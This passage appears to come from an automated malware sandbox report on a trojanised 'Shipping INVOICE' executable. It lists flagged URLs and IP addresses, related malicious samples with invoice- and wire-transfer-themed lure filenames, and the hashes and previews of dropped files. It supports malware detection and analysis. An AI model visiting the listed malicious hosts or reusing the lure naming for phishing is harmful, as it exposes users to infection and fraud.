                                                                            https://comvoce.philco.com.br/wp-forum/administracion/prelogin.phpGet hashmaliciousBrowse
                                                                            • 157.230.76.65
                                                                            https://ilovesanmarzanodop.com/wp-content/uploads/2020/supp/adfs/index.htmlGet hashmaliciousBrowse
                                                                            • 164.90.215.56
                                                                            qWuT75h3FNx6Mbp.exeGet hashmaliciousBrowse
                                                                            • 46.101.142.174
                                                                            http://192.241.239.251Get hashmaliciousBrowse
                                                                            • 192.241.239.251

JA3 Fingerprints

No context

Dropped Files

C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe
• Filename: 4IZjnTicql.exe, Detection: malicious
• Filename: vthr97FHLT.rtf, Detection: malicious
• Filename: mses.exe, Detection: malicious
• Filename: Wire slip.exe, Detection: malicious
• Filename: uiWs90xemq.exe, Detection: malicious
• Filename: mMpUmTDiLo.exe, Detection: malicious
• Filename: SO12145970.exe, Detection: malicious
• Filename: order.exe, Detection: malicious
• Filename: Ca5l6Ndopx.exe, Detection: malicious
• Filename: Dhl package - pdf.exe, Detection: malicious
• Filename: BOQ Specification.exe, Detection: malicious
• Filename: Drawings For MOPA.exe, Detection: malicious

C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll
• Filename: zgUsJgf4Tz.exe, Detection: malicious
• Filename: TwptRHhOAE.doc, Detection: malicious
• Filename: yHn715noho.exe, Detection: malicious
• Filename: vxLhI0gpXQ.exe, Detection: malicious
• Filename: Wire TT.exe, Detection: malicious
• Filename: mananyi.exe, Detection: malicious
• Filename: Bukti transfer-07-03-2020.exe, Detection: malicious
• Filename: y7VVT4uCPj.exe, Detection: malicious
• Filename: Bank wire receipt.exe, Detection: malicious

C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll
• Filename: #U062f#U0644#U064a#U0644 #U0639#U0644#U0649 #U0627#U0644#U062f#U0641#U0639.exe, Detection: malicious
• Filename: 7Dn18AigNe.exe, Detection: malicious
• Filename: aps.exe, Detection: malicious
• Filename: Wire confirmation_pdf.exe, Detection: malicious
• Filename: DHL_AWB_INV_9882900_99862788_998.exe, Detection: malicious
• Filename: ZjAWsG7aGq.exe, Detection: malicious

Created / dropped Files

C:\Users\user\AppData\Local\Temp\3\phplive\12.opends60.dll
Process: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
File Type: data
Category: dropped
Size (bytes): 53
Entropy (8bit): 4.239357190608839
Encrypted: false
SSDEEP: 3:p/uBEp/EiOmB4EAOM1F:RcAk2KHP
MD5: DAA2B2B53C73519E2CFE5239A33D7FE2
SHA1: 4CDC35F6B76191DFB8045FFA68994AD7D470491A
SHA-256: 079BBC83AE9ECB7D781BD24EEDBAEEE2B58009906739990C97A0976AB9332E81
SHA-512: 2130E15A5686EE1788C29C2022922C128257EB7C45313B49DD2946A23C9D9A78B7CB0AD3C700B2C3FFDD9225B5D9A020DE9B4A01114D771C4A850507F72E950C
Malicious: false
Reputation: moderate, very likely benign file
Preview: ......L....9!...D..._srv_ansi_paramdata.opends60.dll.

C:\Users\user\AppData\Local\Temp\3\phplive\66.opends60.dll
Process: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
File Type: data
Category: dropped
Size (bytes): 42
Entropy (8bit): 4.034709089239382
Encrypted: false
SSDEEP: 3:p/uBJzETOM1F:RcGHP
MD5: 3F2A75E68F8D67494B386DFAA5ABE2B3
SHA1: F405E0BC8B4FC2CAD111045C67E3C64343E2C7CA
SHA-256: E7AB6B06A1134F3EFE20FC5816AD5402C8E111FBD5031EC4F2C520224B9D5BDB
SHA-512: A7909C511287C5A2F59992BD674998D0714F100CEAB30168D9C9F85FC3E6B9BA76D0066C2CEA3FEED9AE2E651605FDD0F3992C849300B9C073F4CB1D05ADA90E
Malicious: false
Reputation: low
Preview: ......L....9........_srv_run.opends60.dll.

C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll
Process: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 27648
Entropy (8bit): 4.228986376506815
Encrypted: false
SSDEEP: 384:o4Fw3juO2A7BJ4a8VtZdGzcoRA3qswV/iYeSWsaeW7+J8d:5FmcaqGwoRA3qswV/ZeB6J
MD5: FE529E3B23EA66C07B43314EF0081B58
SHA1: 5CC7F144DCCB312B0DC6BA7AD0CB2456F2FC3C61
SHA-256: C2FA4308C73812360FC3FB01201B0FC9D1C6B53451ED15DF3739088A4C8789D5
SHA-512: 8CA88376FB051481C44C51FDF38D90BADEBB255AF2DAC51DDB298AA0F203F1130DAE73D667F1CACCE4E6D80CDC846DBE09FA7A2BB0790E80FF8E584B55E3C6D8
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: zgUsJgf4Tz.exe, Detection: malicious
• Filename: TwptRHhOAE.doc, Detection: malicious
• Filename: yHn715noho.exe, Detection: malicious
• Filename: vxLhI0gpXQ.exe, Detection: malicious
• Filename: Wire TT.exe, Detection: malicious
• Filename: mananyi.exe, Detection: malicious
• Filename: Bukti transfer-07-03-2020.exe, Detection: malicious
• Filename: y7VVT4uCPj.exe, Detection: malicious
• Filename: Bank wire receipt.exe, Detection: malicious
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L.....3C...........!.........j.....................n.....................................................................................g...........................................................................................................rsrc....g.......h..................@..@.reloc...............j..............@..B............................@.......X.......p...........................................................................................................................e...(...f...@...g...X...h...p...i.......j.......k.......l.......m.......u.......{...........0....#..H...T$..`...................~...x...................................3.......4.......9... ...:...8...G...P.......h...........................................-...................................(.......................@...........

C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll
Process: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 36864
Entropy (8bit): 4.076507463551346
Encrypted: false
SSDEEP: 384:CZPGn19CO5ESSQhJm9hMKCMI6g6ihJSxUCR1rgCPKabK2t0X5P7DZ+R/WeM2W:CVgRESSSKMBMI6FRJjM
MD5: 27280F57DF0638B41F709DAC754330D8
SHA1: B7F3BF2C0BF39E523B7E4C79D7DAFD1E59B84B60
SHA-256: 75D22B4B3D7CD995B99CA4EB3EFA782F3BDFF9675BC64CCE409223109FDA6DE7
SHA-512: 8444E270D52F17E077D2B3A5B149FCF9029761B6E37411F213A055CB0942BE859EB60547CC4F1411F503EFB50D0D5539C3671F0CF6E2B9C1D9506E07DA21D869
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:
• Filename: #U062f#U0644#U064a#U0644 #U0639#U0644#U0649 #U0627#U0644#U062f#U0641#U0639.exe, Detection: malicious
• Filename: 7Dn18AigNe.exe, Detection: malicious
• Filename: aps.exe, Detection: malicious
• Filename: Wire confirmation_pdf.exe, Detection: malicious
• Filename: DHL_AWB_INV_9882900_99862788_998.exe, Detection: malicious
• Filename: ZjAWsG7aGq.exe, Detection: malicious
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%.3C...........!.....`... ......N.... .........l. ..............................~........................................~..O...................................|~............................................... ............... ..H............text...T_... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3\phplive\competitorsalesliterature.xml
Process: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
File Type: XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 5902
Entropy (8bit): 4.93869769577694
Encrypted: false
SSDEEP: 96:TF+NU24NUNQYtsSztsOBtsWYtso9hj/Y3P:TcU2IUqosSpsGsWose8
MD5: AE2BF9A46C64D68E42ECB985C1D2DE71
SHA1: 9697E538D714CDF375EA907738DBFD219A0853FB
SHA-256: 0F98148F02B339F99B13587FD33F9796CC2E8DA76FFBB4EB27AF6C3D2CBAC945
SHA-512: AA62BA3EB0BDD2F9DB3FD74000C5D709131DFD48928A93FDF570790F6123C39D3E50BCAAEB2C3C472B5471A241D6ACE93E8DE19CE3D8CAB7EAE1B9C3932D9E9D
Malicious: false
Reputation: low
                                                                                                                                  Preview: .<?xml version="1.0" encoding="utf-8"?>..<?xml-stylesheet type='text/xsl' href='entity.xsl'?>..<Entity xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">.. <id>a8e2826b-b430-4c13-8765-d2b009e48f99</id>.. <name>CompetitorSalesLiterature</name>.. <physicalname>CompetitorSalesLiterature</physicalname>.. <logicalname>competitorsalesliterature</logicalname>.. <intersect>true</intersect>.. <security>false</security>.. <lookup>false</lookup>.. <assignment>false</assignment>.. <integrationeventmask>0</integrationeventmask>.. <workfloweventmask>0</workfloweventmask>.. <islogical>false</islogical>.. <Column>.. <id>41607dc6-fea4-4e40-9f7d-f0c2c71d79ee</id>.. <column>1</column>.. <in-code-name>competitorid</in-code-name>.. <logicalname>competitorid</logicalname>.. <physicalname>CompetitorId</physicalname>.. <length-bytes>16</length-bytes>.. <length-chars />.. <nullable>no</nullable>.. <is-pk-column>yes</is-pk
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\flac.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2706
                                                                                                                                  Entropy (8bit):5.179516218922872
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cFfH8vKYndVmmXlTkeH9vI5CduyrmmVp2i45dMg8FaTqye+B0Soqks4cyyRgLRdn:/KYn3mmXl4o1wCduyrmmVp2i4LMg8Fac
                                                                                                                                  MD5:DABA225688B554152EB810A36D5AAA0B
                                                                                                                                  SHA1:B21070F810E2F18F198BB08409CA14EFC9EAEF5C
                                                                                                                                  SHA-256:1806FD102100C6F3748942670CAAB86C19F7564CD69BB96A1FC0B29929230CCF
                                                                                                                                  SHA-512:E3B7834082281B31F9C15E8A2B580AD1ABAC9718C9866454135B8D1A83E62916FF17D5B9FB1CADF2AE80BF6C4DF9F1DDD98D0037A9A923DCBB2D56FB86D6A3BB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="audio/flac">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>FLAC audio</comment>. <comment xml:lang="ar">FLAC ....</comment>. <comment xml:lang="be@latin">A.dyjo FLAC</comment>. <comment xml:lang="bg">..... . FLAC</comment>. <comment xml:lang="ca">.udio FLAC</comment>. <comment xml:lang="cs">zvuk FLAC</comment>. <comment xml:lang="da">FLAC-lyd</comment>. <comment xml:lang="de">FLAC-Audio</comment>. <comment xml:lang="el">.... FLAC</comment>. <comment xml:lang="en_GB">FLAC audio</comment>. <comment xml:lang="eo">FLAC-sondosiero</comment>. <comment xml:lang="es">sonido FLAC</comment>. <comment xml:lang="eu">FLAC audioa</comment>. <comment xml:lang="fi">FLAC-..ni</comment>. <comment xml:lang="fo">FLAC lj..ur</comment>. <comment xml:lang="fr">audio FLAC</comment>. <comment xml:lang="ga">fuaim FLAC</commen
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):39104
                                                                                                                                  Entropy (8bit):6.237597979894025
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:QRi/Yplgp4V5qWNqYoMfTF/K4itMpdRJDh9ODV0L3d/o+X:AKYLHV5ZNbnFy4itMpdD7ODV0R/oK
                                                                                                                                  MD5:58C655527B57D74AE3C189A60A42DA18
                                                                                                                                  SHA1:F267630311A1C42CE9C4F0DEDA00E4132E9F8B25
                                                                                                                                  SHA-256:A2F590DEA50CDE47B0325D7A9ADEEA464257F46B76C059CF3E1AB2DB65574685
                                                                                                                                  SHA-512:03C708A23339792802F506278891005E521B7188D0558FCC0F25DFD0C7CB0048C8FBF1F9FB1AC65FD6EF4BC4C7CAC1715BCD8F07DD82E3E6770E327CC630E209
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                   • Antivirus: Metadefender, Detection: 0%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                   • Filename: 4IZjnTicql.exe, Detection: malicious
                                                                                                                                   • Filename: vthr97FHLT.rtf, Detection: malicious
                                                                                                                                   • Filename: mses.exe, Detection: malicious
                                                                                                                                   • Filename: Wire slip.exe, Detection: malicious
                                                                                                                                   • Filename: uiWs90xemq.exe, Detection: malicious
                                                                                                                                   • Filename: mMpUmTDiLo.exe, Detection: malicious
                                                                                                                                   • Filename: SO12145970.exe, Detection: malicious
                                                                                                                                   • Filename: order.exe, Detection: malicious
                                                                                                                                   • Filename: Ca5l6Ndopx.exe, Detection: malicious
                                                                                                                                   • Filename: Dhl package - pdf.exe, Detection: malicious
                                                                                                                                   • Filename: BOQ Specification.exe, Detection: malicious
                                                                                                                                   • Filename: Drawings For MOPA.exe, Detection: malicious
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\thermal-cpu-cdev-order.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:exported SGML document, ASCII text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):508
                                                                                                                                  Entropy (8bit):4.640723757143228
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:pvPN+VnvbZdr5vZb1bBZb8bZbTZbqMB1C:tsb/r5vZb1FZbYZbTZbqMB1C
                                                                                                                                  MD5:6BBB6D648BA2C70B9635E843818BEEBB
                                                                                                                                  SHA1:21BF5A1ACF381285EF3FE88D180B3F17D474804C
                                                                                                                                  SHA-256:9E4A02255ACD8A4C10373B6E64454A95E57986C32245A6EDA7B8CF7F57E3D740
                                                                                                                                  SHA-512:000324D55AC800870CC761C260A3DEE1EB4FA363426AE1C525FE72503502D4AA9F51104CFAB657C6F55D137BD3F1DDC5A1A4ACBA8F022468C0C1721AEFCB1A79
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: . .Specifies the order of compensation to cool CPU only..There is a default already implemented in the code, but.this file can be used to change order..The Following cooling device can present.-->..<CoolingDeviceOrder>.. Specify Cooling device order -->..<CoolingDevice>rapl_controller</CoolingDevice>..<CoolingDevice>intel_pstate</CoolingDevice>..<CoolingDevice>intel_powerclamp</CoolingDevice>..<CoolingDevice>cpufreq</CoolingDevice>..<CoolingDevice>Processor</CoolingDevice>.</CoolingDeviceOrder>..
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\vnd.ms-excel.sheet.macroenabled.12.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):7697
                                                                                                                                  Entropy (8bit):5.515382730457339
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:xAYS+gpcZWaIarmt/Omdwgm+Wz+BKUpva8i+NfY+g+uP+p+1dS59F0+9mo0my+Cn:9XxBi0Wxko7OXe8j57T2pgIcB
                                                                                                                                  MD5:5A6CAD444DBF130B22F855A889DBE677
                                                                                                                                  SHA1:8F91D234CBE3AFC1F1993BE8C63A68F756FDFC83
                                                                                                                                  SHA-256:A76702F606092D47669779F8D48F2F701319437223D87EAD41D2FA068522FF87
                                                                                                                                  SHA-512:3D777032EF8CE336E233F43A6FBDC08CFC305FE22A91433A580922A035FD71C819B423D314A888F8875FCCD0E89B3869553A38A9B20A6D078B4BDCF398818E85
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="application/vnd.ms-excel.sheet.macroEnabled.12">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment xml:lang="be@latin">Ra.likovy akru. Excel</comment>. <comment xml:lang="en_GB">Excel spreadsheet</comment>. <comment xml:lang="fo">Excel rokniark</comment>. <comment xml:lang="ia">Folio de calculo Excel</comment>. <comment xml:lang="pt_BR">Planilha do Excel</comment>. <comment xml:lang="sq">Flet. llogaritje Excel</comment>. <comment xml:lang="zh_CN">Excel ....</comment>. <comment xml:lang="zh_TW">Excel ...</comment>. <generic-icon name="x-office-spreadsheet"/>. <glob pattern="*.xlsm"/>. <sub-class-of type="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"/>. <comment>Microsoft Excel Worksheet</comment>. <comment xml:lang="af">Microsoft Excel-werkvel</comment>. <comment xml:lang="am">Microsoft Exce
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\x-texinfo.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3100
                                                                                                                                  Entropy (8bit):5.010092205102224
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:nMxJAtLuI0UYJmMcaRb2kV2JjUWBULitlqp8cwngpzQNzxkK3eTHg3GXGSIDMH79:nD0bqFi2I5
                                                                                                                                  MD5:61FFA6F5926C7F2CF819C2A0774D3E21
                                                                                                                                  SHA1:BEC77DA7C7492860DA713F8B87279CB1A3DDCB11
                                                                                                                                  SHA-256:07A5F4DFB449940A7BEA1F100120AE284067F24961457FF5F56C16F556BE4856
                                                                                                                                  SHA-512:3556CAC3A1713FF61D297F9837841DE8DB31CD90AAB848AA2BAE6BF8B1F6BFA4D42AD10324C9BAEA65BE7F08359267952B37B531C8823E4EF859202AD5AB45EB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="text/x-texinfo">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>TeXInfo document</comment>. <comment xml:lang="ar">..... TeXInfo</comment>. <comment xml:lang="ast">Documentu TeXInfo</comment>. <comment xml:lang="az">TeXInfo s.n.di</comment>. <comment xml:lang="be@latin">Dakument TeXInfo</comment>. <comment xml:lang="bg">........ . TeXInfo</comment>. <comment xml:lang="ca">document TeXInfo</comment>. <comment xml:lang="cs">dokument TeXInfo</comment>. <comment xml:lang="cy">Dogfen TeXInfo</comment>. <comment xml:lang="da">TeXInfo-dokument</comment>. <comment xml:lang="de">TeXInfo-Dokument</comment>. <comment xml:lang="el">....... TeXInfo</comment>. <comment xml:lang="en_GB">TeXInfo document</comment>. <comment xml:lang="eo">TeXInfo-dokumento</comment>. <comment xml:lang="es">documento de TeXInfo</comme
                                                                                                                                  C:\Users\user\AppData\Local\Temp\Erodium
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):238433
                                                                                                                                  Entropy (8bit):7.998471610150145
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:6144:BQfR8c9EBhNjuw4YNm8vH128zEoE/qG/ydG5h3aYvDUImzle+wX3:BQxUSw4YNXdJvE/qwakLvDupEH
                                                                                                                                  MD5:980A6B092855D202363B6436E4A854E8
                                                                                                                                  SHA1:AA8E1A7E1AB7832C3112E5C35B7DA143FF919CE0
                                                                                                                                  SHA-256:F617D029F947EBB5C0B7B159233E699F5653A1F92E81F9FE44C60555884DC93C
                                                                                                                                  SHA-512:6DEDF42A718DBC5A4AD25C20561C3ADC0FC629D1135AA68D02FC264363617C827FE7EAA0DD49E828DF93D80852B4E5AA8C932B20D43FF833C02C4B868DF30367
                                                                                                                                  Malicious:false
                                                                                                                                  C:\Users\user\AppData\Local\Temp\Prehnite.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):73728
                                                                                                                                  Entropy (8bit):5.318897902733705
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:TXpmIFZK536QZVz2LHG/jgVUTTkSTC+OWsGMN8ZoVVtAb1zcGtIrdCR:T5nc3hVz26rJNC+OWsGtMtAZzcGtIp0
                                                                                                                                  MD5:F8AA685A3908110E79F4639AA7DADDFA
                                                                                                                                  SHA1:DD4D16172EA4851F757ABD34A8CB3C835552E6A3
                                                                                                                                  SHA-256:AEEA4B86EA607CF9820E3CADD4E98353A57EC789EC0A0E2FEFBDD84ABD25194A
                                                                                                                                  SHA-512:8989A1E5A29043A8CEC9353D8923DC7FCA52988949637133D5AF5F655B04C8016EF8930DA4F57A9C068B8E9208C4B8AE2BDACA9CA699755D139CAB0ED2A3C5A6
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 28%
                                                                                                                                  C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):39936
                                                                                                                                  Entropy (8bit):5.640913891016309
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:fqKIjHhW0CfW0FKT7vZKP1xG69D1/gEehcaLnTJ/2acSd:3RnfW0eoPPXpCnTJ/2acSd
                                                                                                                                  MD5:ED1C00557CDE869CAA963BBF9C820F05
                                                                                                                                  SHA1:53BBD8B86FCBEE9316E02AF399634522B12539B0
                                                                                                                                  SHA-256:4D50CE341BE70511E9A871DD347B3F5793EA97787CDFC92045C0BCC8AAE6E298
                                                                                                                                  SHA-512:509AFC51B647A6904A3A4ABF04B43DFAEE5FA0878C3A822FCE84DD58CE2AB1C15A38610487C520CA6F7C42ED37D754DF55A82B0A81A28D31493F2535D9568405
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                   • Antivirus: Metadefender, Detection: 0%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K4T.*Z..*Z..*Z.'"U..*Z.'"...*Z..*[.}*Z.*"...*Z.*":..*Z.'"...*Z.'"...*Z.Rich.*Z.................PE..L...F..>.................`...F......aU.......p................................................... ..........................`c...........6..............................................................@............................................text...F^.......`.................. ..`.data........p.......d..............@....rsrc....6.......6...f..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\font\init\msg\x-navi-animation.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3225
                                                                                                                                  Entropy (8bit):5.314169702825883
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:1H5/nf2jK/PMQ5B15rPYs7xV01oAZXw5BQDs4XJxjvF1w0ng0nnmDkrZeClbrIMH:ffIil2FI0
                                                                                                                                  MD5:9565C08D6037EEA308B97581F12BE260
                                                                                                                                  SHA1:1954B1CFBF437BD79FDD597C15C25BB01B83F243
                                                                                                                                  SHA-256:1199A3E8F3C8C23C59FEB468A1D1542BA6ABE3C373589DF0277924EAFDB50D57
                                                                                                                                  SHA-512:247762DF5C903AC0F478831A88FB4E0FE3EDF5404FE3D263A443BC035D9741317DF8CDA8284A6409C3D7DB8E89742520E9DCAC4F9E0BB38ED18E24C791D6CA0D
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="application/x-navi-animation">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>Windows animated cursor</comment>. <comment xml:lang="ar">.... ...... .......</comment>. <comment xml:lang="be@latin">Animavany kursor Windows</comment>. <comment xml:lang="bg">...... . Windows, ........</comment>. <comment xml:lang="ca">cursor animat de Windows</comment>. <comment xml:lang="cs">animovan. kurzor Windows</comment>. <comment xml:lang="da">Windowsanimeret mark.r</comment>. <comment xml:lang="de">Animierter Windows-Cursor</comment>. <comment xml:lang="el">.......... ....... Windows</comment>. <comment xml:lang="en_GB">Windows animated cursor</comment>. <comment xml:lang="es">cursor animado de Windows</comment>. <comment xml:lang="eu">Windows-eko kurtsore animatua</comment>. <comment xm
                                                                                                                                  C:\Users\user\AppData\Local\Temp\font\init\msg\x-pn-audibleaudio.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):392
                                                                                                                                  Entropy (8bit):4.965076682722952
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:TMHd97KLSjTqy3F4N5542UHZ2DKX2IRKCJSHUBmAyJSHUBmA4AsF:2d97/joqZHZ2i2kKCLBmrLBmpjF
                                                                                                                                  MD5:AD1C969082DE8AA77B382516F5B0FF61
                                                                                                                                  SHA1:A83DC30341A5752A9D0D18770EF257C8C0B3A692
                                                                                                                                  SHA-256:78930E0C87BC468FC5B13A5F971C244D9158C9DE7B1F2C219213E5CA18E60F03
                                                                                                                                  SHA-512:559B71307FF0159089FA194B1C0359B446C23A78F3B44D969BA44B759ACA409BFF0B63F7FF5CA7BDA840583F9C29E13527B36DA45CBEAB6189D15BA9037F473B
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="audio/x-pn-audibleaudio">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>Audible.Com audio</comment>. <glob pattern="*.aa"/>. <glob pattern="*.aax"/>. <alias type="audio/vnd.audible"/>. <alias type="audio/vnd.audible.aax"/>.</mime-type>.
                                                                                                                                  C:\Users\user\AppData\Local\Temp\manage\mms\VCProjectEngine.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1078
                                                                                                                                  Entropy (8bit):5.254976539067803
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:2djEk62f7mmhKslkmog89hEmYnLuZ1nLw3LHEaFXu0:cjP7mmh3amorEmYnLinLw3LHEaFXL
                                                                                                                                  MD5:3E2460DF0763A75406D2C92A6CAC864C
                                                                                                                                  SHA1:3CC0933DF52BD4B09767ADA563B58923EF68EBAF
                                                                                                                                  SHA-256:301A735BCB6DE1DE09D0B9098228A419954404D8AA575F40AD82FC3A84403E35
                                                                                                                                  SHA-512:5B80AEBC3BEC840CE2ED024E1D6551F67E6DC7F611FDE1F054F7A4053AECDE72460517C5203672694E98DBE9F9C97CFEE2CF9A5FB39DCDCB17862051039D3FEA
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<VCPlatformConfigurationFile ...Version="8.00"...>.. <Platform ....Name="VCProjectEngine.dll" ....Identifier="Win32"....>....<Directories .....Include="$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(VCInstallDir)PlatformSDK\include;$(FrameworkSDKDir)include".....Library="$(VCInstallDir)lib;$(VCInstallDir)atlmfc\lib;$(VCInstallDir)atlmfc\lib\i386;$(VCInstallDir)PlatformSDK\lib;$(FrameworkSDKDir)lib;$(VSInstallDir);$(VSInstallDir)lib".....Path="$(VCInstallDir)bin;$(VCInstallDir)PlatformSDK\bin;$(VSInstallDir)Common7\Tools\bin;$(VSInstallDir)Common7\tools;$(VSInstallDir)Common7\ide;$(ProgramFiles)\HTML Help Workshop;$(FrameworkSDKDir)bin;$(FrameworkDir)$(FrameworkVersion);$(VSInstallDir);$(VSInstallDir)\SDK\v2.0\bin;$(SystemRoot)\SysWow64;$(FxCopDir);$(PATH)".....Reference="$(FrameworkDir)$(FrameworkVersion);$(VCInstallDir)atlmfc\lib".....Source="$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\mfcm;$(VCInstallDir)atlmfc\src\atl;$(
                                                                                                                                  C:\Users\user\AppData\Local\Temp\manage\mms\WordExceptList.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3965
                                                                                                                                  Entropy (8bit):4.628651510242669
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:J9EFoF4F+FYwFkkkOzycs608uXPfzW6up8JiJHhwU9gvzu/6v1wtgETtkbvcIEeP:JpCHncA75Jz
                                                                                                                                  MD5:EF0EA2A1ECE97BE3CF9C9F1D30670E34
